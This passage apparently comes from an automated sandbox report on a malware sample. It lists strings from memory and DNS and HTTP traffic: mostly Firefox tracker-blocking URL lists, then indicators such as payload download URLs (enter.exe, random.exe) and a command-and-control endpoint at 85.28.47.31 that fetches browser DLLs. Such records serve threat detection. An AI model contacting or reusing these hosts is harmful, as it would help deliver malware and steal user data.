"*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"] equals www.rambler.ru (Rambler)
Source: firefox.exe, 00000028.00000002.2922562667.0000026194607000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2922562667.000002619460B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2922562667.0000026194607000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", 
"*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", 
"*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000028.00000002.2922562667.000002619460B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002F.00000002.2851889197.00000130BD7DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: efox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/acc equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539259000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: empTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://www.inbox.lv/rfc2368/?value=%s equals www.yahoo.com (Yahoo)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://en.wikipedia.org/wiki/Special:Search**://www.facebook.com/platform/impression.php**://*.adsafeprotected.com/*/unit/*sessionstore-final-state-write-complete equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2931107138.0000026194CDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2931107138.0000026194CDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: ead6a72944.exe, 0000001C.00000003.2704365877.0000000002117000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account`T equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002F.00000002.2855549826.00000130BDB50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: pData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Fir equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2708137723.000001E53926D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2738774897.000001E539272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s://www.youtube.com/account --attempting-deelevation'9 equals www.youtube.com (Youtube)
Source: ead6a72944.exe, 0000001C.00000003.2704593283.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, ead6a72944.exe, 0000001C.00000003.2704365877.0000000002117000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: set "URL=https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2766541210.000001E53ADC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ta\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2919430058.0000026193B3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2919430058.0000026193BAA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2922894584.0000026194761000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2931107138.0000026194CA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2946351533.000015A18C600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2946351533.000015A18C600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.comZ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2946351533.000015A18C600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.comc equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2916024047.00000261935B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2922894584.0000026194711000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2916024047.0000026193568000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2889124341.000002618F10F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xhttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: vaniloin.fun
Source: global traffic DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic DNS traffic detected: DNS query: www.youtube-nocookie.com
Source: unknown HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: firefox.exe, 00000028.00000002.2900012409.000002619227D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2879465068.0000026181E68000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: file.exe, 00000000.00000002.2435800238.0000000028D63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/enter.exe
Source: file.exe, 00000000.00000002.2435800238.0000000028D63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/soka/random.exe
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/soka/random.exeM
Source: explorti.exe, 00000013.00000003.2924686960.00000000014FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: ba77748b9b.exe, 00000016.00000002.2776962096.00000000027AE000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853920976.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853783541.00000000026E0000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 00000016.00000002.2778366166.0000000002825000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853920976.0000000002730000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853920976.00000000026FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/-
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/1vfQ
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/4
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853920976.0000000002730000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853920976.000000000274D000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853920976.00000000026FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php
Source: file.exe, 00000000.00000002.2435800238.0000000028D6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php7
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpKP
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpS
Source: file.exe, 00000000.00000002.2435800238.0000000028D6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpX4
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpY
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpg
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpj
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpjP
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpo
Source: file.exe, 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phposition:
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpq
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpyv
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/7vhQ
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dll
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dllUY
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/mozglue.dll
